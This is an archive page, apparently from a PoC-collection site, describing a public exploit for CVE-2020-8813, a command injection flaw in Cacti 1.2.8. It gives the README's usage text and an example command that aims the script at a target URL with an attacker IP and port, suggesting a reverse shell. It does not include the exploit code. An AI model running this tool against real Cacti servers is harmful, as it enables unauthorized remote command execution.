CVE-2020-8813 PoC — Cacti 操作系统命令注入漏洞

Source

https://github.com/0xm4ud/Cacti-CVE-2020-8813

Associated Vulnerability

Title:Cacti 操作系统命令注入漏洞 (CVE-2020-8813)
Description:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据，使用RRDtool绘画图形进行分析，并提供数据和用户管理功能。 Cacti 1.2.8版本中的graph_realtime.php文件存在安全漏洞。远程攻击者可借助cookie中的shell元字符利用该漏洞执行任意操作系统命令。

Readme

# Cacti-CVE-2020-8813

    Usage: cacti_rce.py [options]

    Options:
      -h, --help            show this help message and exit
      -u URL, --url=URL     [ Required ] target URL eg:. http://Cacti/
      -l LHOST, --lhost=LHOST
                            [ Required ] Attacker IP addr
      -p LPORT, --lport=LPORT
                            [ Default 443 ] Attacker IP Port
                            
                            
# Example:
```
python3 cacti_rce.py -u http://CACTI/ -l 192.168.x.x
```

File Snapshot


 [4.0K]  /data/pocs/ae822f1ef24c5435300ffe04a0497647d0fb8d4c
├── [2.0K]  cacti_rce.py
├── [1.9K]  cacti_rce.py.old
├── [1.0K]  LICENSE
└── [ 511]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!